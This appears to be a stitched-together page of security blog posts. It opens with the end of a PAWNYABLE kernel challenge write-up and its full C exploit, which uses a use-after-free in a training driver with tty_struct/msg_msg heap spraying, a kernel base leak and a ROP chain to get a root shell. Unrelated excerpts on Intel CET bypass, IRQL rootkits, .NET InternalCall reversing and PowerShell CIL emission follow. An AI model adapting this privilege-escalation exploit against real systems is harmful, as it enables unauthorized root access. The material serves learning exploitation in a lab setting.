So now that we know where our ROP chain is, and where our faked function table is, and we have the perfect stack pivot gadget, the rest of this process is simply building a real ROP chain which I will leave out of this post.

As a first-timer, I found that this tiny bit of creativity, leveraging the read ability to leak the addresses of msg_msg structs, was enough to get me hooked. Here is a picture of the exploit in action:

Miscellaneous

There were some things I tried to do to increase the exploit’s reliability.

One was to check the magic value in the leaked tty_structs to make sure a tty_struct had actually filled our freed memory and not another object. This is extremely convenient! All tty_structs have 0x5401 at tty->magic.

Another thing I did was spray msg_msg structs with an easily recognizable message type of 0x1337. This way when leaked, I could easily verify I was in fact leaking msg_msg contents and not some other arbitrary data structure. Another thing you could do would be to make sure supposed kernel addresses start with 0xffff.
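
A hedged sketch of those sanity checks is below; the helper names are mine, but the marker value and the list-pointer comparison match what the full exploit does in found_msg().

#include <stdint.h>
#include <stdbool.h>

// Quick heuristics on the leaked msg_msg fields: our marker type,
// kernel-looking list pointers, and distinct next/prev.
static bool looks_like_kernel_ptr(uint64_t p) {
    return (p >> 48) == 0xffff;   // canonical kernel-half address
}

static bool looks_like_our_msg(uint64_t next, uint64_t prev, int64_t m_type) {
    if (m_type != 0x1337L)            return false;  // not our marker
    if (!looks_like_kernel_ptr(next)) return false;
    if (!looks_like_kernel_ptr(prev)) return false;
    if (next == prev)                 return false;  // should differ
    return true;
}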

Finally, there was the patching of the clean-up-related function pointers in tty->ops.

Further Reading

There are lots of challenges besides the UAF one on PAWNYABLE; please go check them out. One of the primary reasons I wrote this was to get the author’s project more visitors and beneficiaries. It has made a big difference for me, and in the month or so since I finished this challenge, I have learned a ton. Special thanks to @chompie1337 for letting me complain and for giving me helpful advice/resources.

Some awesome blogposts I read throughout the learning process up to this point include:

  • https://www.graplsecurity.com/post/iou-ring-exploiting-the-linux-kernel
  • https://a13xp0p0v.github.io/2021/02/09/CVE-2021-26708.html
  • https://ruia-ruia.github.io/2022/08/05/CVE-2022-29582-io-uring/
  • https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html

Exploit Code

// One liner to add exploit to filesystem
// gcc exploit.c -o exploit -static && cp exploit rootfs && cd rootfs && find . -print0 | cpio -o --format=newc --null --owner=root > ../rootfs.cpio && cd ../

#include <stdio.h> /* printf */
#include <sys/types.h> /* open */
#include <sys/stat.h> /* open */
#include <fcntl.h> /* open */
#include <stdlib.h> /* exit */
#include <stdint.h> /* int_t's */
#include <unistd.h> /* getuid */
#include <string.h> /* memset */
#include <sys/ipc.h> /* msg_msg */ 
#include <sys/msg.h> /* msg_msg */
#include <sys/ioctl.h> /* ioctl */
#include <stdarg.h> /* va_args */
#include <stdbool.h> /* true, false */ 

#define DEV "/dev/holstein"
#define PTMX "/dev/ptmx"

#define PTMX_SPRAY (size_t)50       // Number of terminals to allocate
#define MSG_SPRAY (size_t)32        // Number of msg_msg's per queue
#define NUM_QUEUE (size_t)4         // Number of msg queues
#define MSG_SZ (size_t)512          // Size of each msg_msg, modulo 8 == 0
#define GBUF_SZ (size_t)0x400       // Size of g_buf in driver

// User state globals
uint64_t user_cs;
uint64_t user_ss;
uint64_t user_rflags;
uint64_t user_sp;

// Mutable globals, when in Rome
uint64_t base;
uint64_t rop_addr;
uint64_t fake_table;
uint64_t ioctl_ptr;
int open_ptmx[PTMX_SPRAY] = { 0 };          // Store fds for clean up/ioctl()
int num_ptmx = 0;                           // Number of open fds
int msg_queue[NUM_QUEUE] = { 0 };           // Initialized message queues
int num_queue = 0;

// Misc constants. 
const uint64_t rop_len = 200;
const uint64_t ioctl_off = 12 * sizeof(uint64_t);

// Gadgets
// 0x723c0: commit_creds
uint64_t commit_creds;
// 0x72560: prepare_kernel_cred
uint64_t prepare_kernel_cred;
// 0x800e10: swapgs_restore_regs_and_return_to_usermode
uint64_t kpti_tramp;
// 0x14fbea: push rdx; xor eax, 0x415b004f; pop rsp; pop rbp; ret; (stack pivot)
uint64_t push_rdx;
// 0x35738d: pop rdi; ret;
uint64_t pop_rdi;
// 0x487980: xchg rdi, rax; sar bh, 0x89; ret;
uint64_t xchg_rdi_rax;
// 0x32afea: ret;
uint64_t ret;

void err(const char* format, ...) {
    if (!format) {
        exit(-1);
    }

    fprintf(stderr, "%s", "[!] ");
    va_list args;
    va_start(args, format);
    vfprintf(stderr, format, args);
    va_end(args);
    fprintf(stderr, "%s", "\n");
    exit(-1);
}

void info(const char* format, ...) {
    if (!format) {
        return;
    }
    
    fprintf(stderr, "%s", "[*] ");
    va_list args;
    va_start(args, format);
    vfprintf(stderr, format, args);
    va_end(args);
    fprintf(stderr, "%s", "\n");
}

void save_state(void) {
    __asm__(
        ".intel_syntax noprefix;"   
        "mov user_cs, cs;"
        "mov user_ss, ss;"
        "mov user_sp, rsp;"
        // Push CPU flags onto stack
        "pushf;"
        // Pop CPU flags into var
        "pop user_rflags;"
        ".att_syntax;"
    );
}

// Should spawn a root shell
void pop_shell(void) {
    uid_t uid = getuid();
    if (uid != 0) {
        err("We are not root, wtf?");
    }

    info("We got root, spawning shell!");
    system("/bin/sh");
    exit(0);
}

// Open a char device, just exit on error, this is exploit code
int open_device(char *dev, int flags) {
    int fd = -1;
    if (!dev) {
        err("NULL ptr given to `open_device()`");
    }

    fd = open(dev, flags);
    if (fd < 0) {
        err("Failed to open '%s'", dev);
    }

    return fd;
}

// Spray kmalloc-1024 sized '/dev/ptmx' structures on the kernel heap
void alloc_ptmx() {
    int fd = open("/dev/ptmx", O_RDONLY | O_NOCTTY);
    if (fd < 0) {
        err("Failed to open /dev/ptmx");
    }

    open_ptmx[num_ptmx] = fd;
    num_ptmx++;
}

// Check to see if we have a reference to a tty_struct by reading in the magic
// number for the current allocation in our slab
bool found_ptmx(int fd) {
    unsigned char magic_buf[4];
    if (fd < 0) {
        err("Bad fd given to `found_ptmx()`\n");
    }

    ssize_t bytes_read = read(fd, magic_buf, 4);
    if (bytes_read != (ssize_t)sizeof(magic_buf)) {
        err("Failed to read enough bytes from fd: %d", fd);
    }

    if (*(int32_t *)magic_buf != 0x5401) {
        return false;
    }

    return true;
}

// Leak a tty_struct->ops field which is constant offset from kernel base
uint64_t leak_ops(int fd) {
    if (fd < 0) {
        err("Bad fd given to `leak_ops()`");
    }

    /* tty_struct {
        int magic;      // 4 bytes
        struct kref;    // 4 bytes (single member is an int refcount_t)
        struct device *dev; // 8 bytes
        struct tty_driver *driver; // 8 bytes
        const struct tty_operations *ops; (offset 24 (or 0x18))
        ...
    } */

    // Read first 32 bytes of the structure
    unsigned char *ops_buf = calloc(1, 32);
    if (!ops_buf) {
        err("Failed to allocate ops_buf");
    }

    ssize_t bytes_read = read(fd, ops_buf, 32);
    if (bytes_read != (ssize_t)32) {
        err("Failed to read enough bytes from fd: %d", fd);
    }

    uint64_t ops = *(uint64_t *)&ops_buf[24];
    info("tty_struct->ops: 0x%lx", ops);

    // Solve for kernel base, keep the last 12 bits
    uint64_t test = ops & 0b111111111111;

    // These magic compares are for static offsets on this kernel
    if (test == 0xb40ULL) {
        return ops - 0xc39b40ULL;
    }

    else if (test == 0xc60ULL) {
        return ops - 0xc39c60ULL;
    }

    else {
        err("Got an unexpected tty_struct->ops ptr");
    }
}

void solve_gadgets(void) {
    // 0x723c0: commit_creds
    commit_creds = base + 0x723c0ULL;
    printf("    >> commit_creds located @ 0x%lx\n", commit_creds);

    // 0x72560: prepare_kernel_cred
    prepare_kernel_cred = base + 0x72560ULL;
    printf("    >> prepare_kernel_cred located @ 0x%lx\n", prepare_kernel_cred);

    // 0x800e10: swapgs_restore_regs_and_return_to_usermode
    kpti_tramp = base + 0x800e10ULL + 22; // 22 offset, avoid pops
    printf("    >> kpti_tramp located @ 0x%lx\n", kpti_tramp);

    // 0x14fbea: push rdx; xor eax, 0x415b004f; pop rsp; pop rbp; ret;
    push_rdx = base + 0x14fbeaULL;
    printf("    >> push_rdx located @ 0x%lx\n", push_rdx);

    // 0x35738d: pop rdi; ret;
    pop_rdi = base + 0x35738dULL;
    printf("    >> pop_rdi located @ 0x%lx\n", pop_rdi);

    // 0x487980: xchg rdi, rax; sar bh, 0x89; ret;
    xchg_rdi_rax = base + 0x487980ULL;
    printf("    >> xchg_rdi_rax located @ 0x%lx\n", xchg_rdi_rax);

    // 0x32afea: ret;
    ret = base + 0x32afeaULL;
    printf("    >> ret located @ 0x%lx\n", ret);
}

// Initialize a kernel message queue
int init_msg_q(void) {
    int msg_qid = msgget(IPC_PRIVATE, 0666 | IPC_CREAT);
    if (msg_qid == -1) {
        err("`msgget()` failed to initialize queue");
    }

    msg_queue[num_queue] = msg_qid;
    num_queue++;

    return msg_qid;
}

// Allocate one msg_msg on the heap
size_t send_message() {
    // Calculate current queue
    if (num_queue < 1) {
        err("`send_message()` called with no message queues");
    }
    int curr_q = msg_queue[num_queue - 1];

    // Send message
    size_t fails = 0;
    struct msgbuf {
        long mtype;
        char mtext[MSG_SZ];
    } msg;

    // Unique identifier we can use
    msg.mtype = 0x1337;

    // Construct the ROP chain
    memset(msg.mtext, 0, MSG_SZ);

    // Pattern for offsets (debugging)
    uint64_t base = 0x41;
    uint64_t *curr = (uint64_t *)&msg.mtext[0];
    for (size_t i = 0; i < 25; i++) {
        uint64_t fill = base << 56;
        fill |= base << 48;
        fill |= base << 40;
        fill |= base << 32;
        fill |= base << 24;
        fill |= base << 16;
        fill |= base << 8;
        fill |= base;
        
        *curr++ = fill;
        base++; 
    }

    // ROP chain
    uint64_t *rop = (uint64_t *)&msg.mtext[0];
    *rop++ = pop_rdi; 
    *rop++ = 0x0;
    *rop++ = prepare_kernel_cred; // RAX now holds ptr to new creds
    *rop++ = xchg_rdi_rax; // Place creds into RDI 
    *rop++ = commit_creds; // Now we have super powers
    *rop++ = kpti_tramp;
    *rop++ = 0x0; // pop rax inside kpti_tramp
    *rop++ = 0x0; // pop rdi inside kpti_tramp
    *rop++ = (uint64_t)pop_shell; // Return here
    *rop++ = user_cs;
    *rop++ = user_rflags;
    *rop++ = user_sp;
    *rop   = user_ss;

    /* struct tty_operations {
        struct tty_struct * (*lookup)(struct tty_driver *driver,
                struct file *filp, int idx);
        int  (*install)(struct tty_driver *driver, struct tty_struct *tty);
        void (*remove)(struct tty_driver *driver, struct tty_struct *tty);
        int  (*open)(struct tty_struct * tty, struct file * filp);
        void (*close)(struct tty_struct * tty, struct file * filp);
        void (*shutdown)(struct tty_struct *tty);
        void (*cleanup)(struct tty_struct *tty);
        int  (*write)(struct tty_struct * tty,
                const unsigned char *buf, int count);
        int  (*put_char)(struct tty_struct *tty, unsigned char ch);
        void (*flush_chars)(struct tty_struct *tty);
        unsigned int (*write_room)(struct tty_struct *tty);
        unsigned int (*chars_in_buffer)(struct tty_struct *tty);
        int  (*ioctl)(struct tty_struct *tty,
                unsigned int cmd, unsigned long arg);
        ...
    } */

    // Populate the 12 function pointers in the table that we have created.
    // There are 3 handlers that are invoked for allocated tty_structs when 
    // their controlling process exits, they are close(), shutdown(),
    // and cleanup(). We have to overwrite these pointers for when we exit our
    // exploit process or else the kernel will panic with a RIP of 
    // 0xdeadbeefdeadbeef. We overwrite them with a simple ret gadget
    uint64_t *func_table = (uint64_t *)&msg.mtext[rop_len];
    for (size_t i = 0; i < 12; i++) {
        // If i == 4, we're on the close() handler, set to ret gadget
        if (i == 4) { *func_table++ = ret; continue; }

        // If i == 5, we're on the shutdown() handler, set to ret gadget
        if (i == 5) { *func_table++ = ret; continue; }

        // If i == 6, we're on the cleanup() handler, set to ret gadget
        if (i == 6) { *func_table++ = ret; continue; }

        // Magic value for debugging
        *func_table++ = 0xdeadbeefdeadbe00 + i;
    }

    // Put our gadget address as the ioctl() handler to pivot stack
    *func_table = push_rdx;

    // Spray msg_msg's on the heap
    if (msgsnd(curr_q, &msg, MSG_SZ, IPC_NOWAIT) == -1) {
        fails++;
    }

    return fails;
}

// Check to see if we have a reference to one of our msg_msg structs
bool found_msg(int fd) {
    // Read out the msg_msg
    unsigned char msg_buf[GBUF_SZ] = { 0 };
    ssize_t bytes_read = read(fd, msg_buf, GBUF_SZ);
    if (bytes_read != (ssize_t)GBUF_SZ) {
        err("Failed to read from holstein");
    }

    /* msg_msg {
        struct list_head m_list {
            struct list_head *next, *prev;
        } // 16 bytes
        long m_type; // 8 bytes
        int m_ts; // 4 bytes
        struct msg_msgseg* next; // 8 bytes
        void *security; // 8 bytes

        ===== Body Starts Here (offset 48) =====
    }*/ 

    // Some heuristics to see if we indeed have a good msg_msg
    uint64_t next = *(uint64_t *)&msg_buf[0];
    uint64_t prev = *(uint64_t *)&msg_buf[sizeof(uint64_t)];
    int64_t m_type = *(uint64_t *)&msg_buf[sizeof(uint64_t) * 2];

    // Not one of our msg_msg structs
    if (m_type != 0x1337L) {
        return false;
    }

    // We have to have valid pointers
    if (next == 0 || prev == 0) {
        return false;
    }

    // I think the pointers should be different as well
    if (next == prev) {
        return false;
    }

    info("Found msg_msg struct:");
    printf("    >> msg_msg.m_list.next: 0x%lx\n", next);
    printf("    >> msg_msg.m_list.prev: 0x%lx\n", prev);
    printf("    >> msg_msg.m_type: 0x%lx\n", m_type);

    // Update rop address
    rop_addr = 48 + next;
    
    return true;
}

void overwrite_ops(int fd) {
    unsigned char g_buf[GBUF_SZ] = { 0 };
    ssize_t bytes_read = read(fd, g_buf, GBUF_SZ);
    if (bytes_read != (ssize_t)GBUF_SZ) {
        err("Failed to read enough bytes from fd: %d", fd);
    }

    // Overwrite the tty_struct->ops pointer with ROP address
    *(uint64_t *)&g_buf[24] = fake_table;
    ssize_t bytes_written = write(fd, g_buf, GBUF_SZ);
    if (bytes_written != (ssize_t)GBUF_SZ) {
        err("Failed to write enough bytes to fd: %d", fd);
    }
}

int main(int argc, char *argv[]) {
    int fd1;
    int fd2;
    int fd3;
    int fd4;
    int fd5;
    int fd6;

    info("Saving user space state...");
    save_state();

    info("Freeing fd1...");
    fd1 = open_device(DEV, O_RDWR);
    fd2 = open_device(DEV, O_RDWR);
    close(fd1);

    // Allocate '/dev/ptmx' structs until we allocate one in our free'd slab
    info("Spraying tty_structs...");
    size_t p_remain = PTMX_SPRAY;
    while (p_remain--) {
        alloc_ptmx();
        printf("    >> tty_struct(s) alloc'd: %lu\n", PTMX_SPRAY - p_remain);

        // Check to see if we found one of our tty_structs
        if (found_ptmx(fd2)) {
            break;
        }

        if (p_remain == 0) { err("Failed to find tty_struct"); }
    }

    info("Leaking tty_struct->ops...");
    base = leak_ops(fd2);
    info("Kernel base: 0x%lx", base);

    // Clean up open fds
    info("Cleaning up our tty_structs...");
    for (size_t i = 0; i < num_ptmx; i++) {
        close(open_ptmx[i]);
        open_ptmx[i] = 0;
    }
    num_ptmx = 0;

    // Solve the gadget addresses now that we have base
    info("Solving gadget addresses");
    solve_gadgets();

    // Create a hole for a msg_msg
    info("Freeing fd3...");
    fd3 = open_device(DEV, O_RDWR);
    fd4 = open_device(DEV, O_RDWR);
    close(fd3);

    // Allocate msg_msg structs until we allocate one in our free'd slab
    size_t q_remain = NUM_QUEUE;
    size_t fails = 0;
    while (q_remain--) {
        // Initialize a message queue for spraying msg_msg structs
        init_msg_q();
        printf("    >> msg_msg queue(s) initialized: %lu\n",
            NUM_QUEUE - q_remain);
        
        // Spray messages for this queue
        for (size_t i = 0; i < MSG_SPRAY; i++) {
            fails += send_message();
        }

        // Check to see if we found a msg_msg struct
        if (found_msg(fd4)) {
            break;
        }
        
        if (q_remain == 0) { err("Failed to find msg_msg struct"); }
    }
    
    // Solve our ROP chain address
    info("`msgsnd()` failures: %lu", fails);
    info("ROP chain address: 0x%lx", rop_addr);
    fake_table = rop_addr + rop_len;
    info("Fake tty_struct->ops function table: 0x%lx", fake_table);
    ioctl_ptr = fake_table + ioctl_off;
    info("Fake ioctl() handler: 0x%lx", ioctl_ptr);

    // Do a 3rd UAF
    info("Freeing fd5...");
    fd5 = open_device(DEV, O_RDWR);
    fd6 = open_device(DEV, O_RDWR);
    close(fd5);

    // Spray more /dev/ptmx terminals
    info("Spraying tty_structs...");
    p_remain = PTMX_SPRAY;
    while(p_remain--) {
        alloc_ptmx();
        printf("    >> tty_struct(s) alloc'd: %lu\n", PTMX_SPRAY - p_remain);

        // Check to see if we found a tty_struct
        if (found_ptmx(fd6)) {
            break;
        }

        if (p_remain == 0) { err("Failed to find tty_struct"); }
    }

    info("Found new tty_struct");
    info("Overwriting tty_struct->ops pointer with fake table...");
    overwrite_ops(fd6);
    info("Overwrote tty_struct->ops");

    // Spam IOCTL on all of our '/dev/ptmx' fds
    info("Spamming `ioctl()`...");
    for (size_t i = 0; i < num_ptmx; i++) {
        ioctl(open_ptmx[i], 0xcafebabe, rop_addr - 8); // pop rbp; ret;
    }

    return 0;
}

Bypassing Intel CET with Counterfeit Objects

22 September 2022 at 00:00
Since its inception in 2005 [1], return-oriented programming (ROP) has been the predominant avenue to thwart the W^X [2] mitigation during memory corruption exploitation. While Data Execution Prevention (DEP) has been engineered to block plain code injection attacks from specific memory areas, attackers quickly adapted: instead of injecting an entire code payload, they resorted to reusing multiple code chunks from DEP-allowed memory pages, called ROP gadgets. These code chunks are taken from already existing code in the target application and chained together to resemble the desired attacker payload, or simply to disable DEP on a per-page basis so that existing code payloads can run.

IRQLs Close Encounters of the Rootkit Kind

3 January 2022 at 00:00
IRQL Overview

Present since the early stages of Windows NT, an Interrupt Request Level (IRQL) defines the current hardware priority at which a CPU runs at any given time. On a multi-processor architecture, each CPU can hold a different and independent IRQL value, which is stored inside the CR8 register. We should keep this in mind as we are going to build our lab examples on a quad-core system. Every hardware interrupt is mapped to a specific request level as depicted below.

Reverse Engineering InternalCall Methods in .NET

16 November 2013 at 19:52
Oftentimes, when attempting to reverse engineer a particular .NET method, I will hit a wall because I’ll dig far enough into the method’s implementation that I’ll reach a private method marked [MethodImpl(MethodImplOptions.InternalCall)]. For example, I was interested in seeing how the .NET framework loads PE files in memory via a byte array using the System.Reflection.Assembly.Load(Byte[]) method. When viewed in ILSpy (my favorite .NET decompiler), it will show the following implementation:
 
 
So the first thing it does is check to see if you’re allowed to load a PE image in the first place via the CheckLoadByteArraySupported method. Basically, if the executing assembly is a tile app, then you will not be allowed to load a PE file as a byte array. It then calls the RuntimeAssembly.nLoadImage method. If you click on this method in ILSpy, you will be disappointed to find that there does not appear to be a managed implementation.
 
 
As you can see, all you get is a method signature and an InternalCall property. To begin to understand how we might be able to reverse engineer this method, we need to know the definition of InternalCall. According to MSDN documentation, InternalCall refers to a method call that “is internal, that is, it calls a method that is implemented within the common language runtime.” So it would seem likely that this method is implemented as a native function in clr.dll. To validate my assumption, let’s use Windbg with sos.dll – the managed code debugger extension. My goal using Windbg will be to determine the native pointer for the nLoadImage method and see if it jumps to its respective native function in clr.dll. I will attach Windbg to PowerShell since PowerShell will make it easy to get the information needed by the SOS debugger extension. The first thing I need to do is get the metadata token for the nLoadImage method. This will be used in Windbg to resolve the method.
 
 
As you can see, the Get-ILDisassembly function in PowerSploit conveniently provides the metadata token for the nLoadImage method. Now on to Windbg for further analysis…
 
 
The following commands were executed:
 
1) .loadby sos clr
 
Load the SOS debugging extension from the directory that clr.dll is loaded from
 
2) !Token2EE mscorlib.dll 0x0600278C
 
Retrieves the MethodDesc of the nLoadImage method. The first argument (mscorlib.dll) is the module that implements the nLoadImage method and the hex number is the metadata token retrieved from PowerShell.
 
3) !DumpMD 0x634381b0
 
I then dump information about the MethodDesc. This will give the address of the method table for the object that implements nLoadImage
 
4) !DumpMT -MD 0x636e42fc
 
This will dump all of the methods for the System.Reflection.RuntimeAssembly class with their respective native entry point. nLoadImage has the following entry:
 
635910a0 634381b0   NONE System.Reflection.RuntimeAssembly.nLoadImage(Byte[], Byte[], System.Security.Policy.Evidence, System.Threading.StackCrawlMark ByRef, Boolean, System.Security.SecurityContextSource)
 
So the native address for nLoadImage is 0x635910a0. Now, set a breakpoint on that address, let the program continue execution and use PowerShell to call the Load method on a bogus PE byte array.
 
PS C:\> [Reflection.Assembly]::Load(([Byte[]]@(1,2,3)))
 
You’ll then hit your breakpoint in Windbg and if you disassemble from where you landed, the function that implements the nLoadImage method will be crystal clear – clr!AssemblyNative::LoadImage
 
 
You can now use IDA for further analysis and begin digging into the actual implementation of this InternalCall method!
 
 
After digging into some of the InternalCall methods in IDA you’ll quickly see that most functions use the fastcall convention. In x86, this means that a static function will pass its first two arguments via ECX and EDX. If it’s an instance function, the ‘this’ pointer will be passed via ECX (as is standard in thiscall) and its first argument via EDX. Any remaining arguments are pushed onto the stack.
 
So for the handful of people that have wondered where the implementation for an InternalCall method lies, I hope this post has been helpful.

Simple CIL Opcode Execution in PowerShell using the DynamicMethod Class and Delegates

2 October 2013 at 00:09
tl:dr version

It is possible to assemble .NET methods with CIL opcodes (i.e. .NET bytecode) in PowerShell in only a few lines of code using dynamic methods and delegates.



I’ll admit, I have a love/hate relationship with PowerShell. I love that it is the most powerful scripting language and shell but at the same time, I often find quirks in the language that consistently bother me. One such quirk is the fact that integers don’t wrap when they overflow. Rather, they saturate – they are cast into the next largest type that can accommodate them. To demonstrate what I mean, observe the following:


You’ll notice that [Int16]::MaxValue (i.e. 0x7FFF) understandably remains an Int16. However, rather than wrapping when adding one, it is upcast to an Int32. Admittedly, this is probably the behavior that most PowerShell users would desire. I, on the other hand, wish I had the option to perform math on integers that wrapped. To solve this, I originally thought that I would have to write an addition function using complicated binary logic. I opted not to go that route and decided to assemble a function using raw CIL (common intermediate language) opcodes. What follows is a brief explanation of how to accomplish this task.


Common Intermediate Language Basics

CIL is the bytecode that describes .NET methods. A description of all the opcodes implemented by Microsoft can be found here. Every time you call a method in .NET, the runtime either interprets its opcodes or it executes the assembly language equivalent of those opcodes (as a result of the JIT process - just-in-time compilation). The calling convention for CIL is loosely related to how calls are made in X86 assembly – arguments are pushed onto a stack, a method is called, and a return value is returned to the caller.

Since we’re on the subject of addition, here are the CIL opcodes that would add two numbers of similar type together and would wrap in the case of an overflow:

IL_0000: Ldarg_0 // Loads the argument at index 0 onto the evaluation stack.
IL_0001: Ldarg_1 // Loads the argument at index 1 onto the evaluation stack.
IL_0002: Add // Adds two values and pushes the result onto the evaluation stack.
IL_0003: Ret // Returns from the current method, pushing a return value (if present) from the callee's evaluation stack onto the caller's evaluation stack.

Per Microsoft documentation, “integer addition wraps, rather than saturates” when using the Add instruction. This is the behavior I was after in the first place. Now let’s learn how to build a method in PowerShell that uses these opcodes.


Dynamic Methods

In the System.Reflection.Emit namespace, there is a DynamicMethod class that allows you to create methods without having to first go through the steps of creating an assembly and module. This is nice when you want a quick and dirty way to assemble and execute CIL opcodes. When creating a DynamicMethod object, you will need to provide the following arguments to its constructor:

1) The name of the method you want to create
2) The return type of the method
3) An array of types that will serve as the parameters

The following PowerShell command will satisfy those requirements for an addition function:

$MethodInfo = New-Object Reflection.Emit.DynamicMethod('UInt32Add', [UInt32], @([UInt32], [UInt32]))

Here, I am creating an empty method that will take two UInt32 variables as arguments and return a UInt32.

Next, I will actually implement the logic of the method by emitting the CIL opcodes into the method:

$ILGen = $MethodInfo.GetILGenerator()
$ILGen.Emit([Reflection.Emit.OpCodes]::Ldarg_0)
$ILGen.Emit([Reflection.Emit.OpCodes]::Ldarg_1)
$ILGen.Emit([Reflection.Emit.OpCodes]::Add)
$ILGen.Emit([Reflection.Emit.OpCodes]::Ret)

Now that the logic of the method is complete, I need to create a delegate from the $MethodInfo object. Before this can happen, I need to create a delegate in PowerShell that matches the method signature for the UInt32Add method. This can be accomplished by creating a generic Func delegate with the following convoluted syntax:

$Delegate = [Func``3[UInt32, UInt32, UInt32]]

The previous command states that I want to create a delegate for a function that accepts two UInt32 arguments and returns a UInt32. Note that the Func delegate wasn't introduced until .NET 3.5 which means that this technique will only work in PowerShell 3+. With that, we can now bind the method to the delegate:

$UInt32Add = $MethodInfo.CreateDelegate($Delegate)

And now, all we have to do is call the Invoke method to perform normal integer math that wraps upon an overflow:

$UInt32Add.Invoke([UInt32]::MaxValue, 2)

Here is the code in its entirety:


For additional information regarding the techniques I described, I encourage you to read the following articles:

Introduction to IL Assembly Language
Reflection Emit Dynamic Method Scenarios
How to: Define and Execute Dynamic Methods
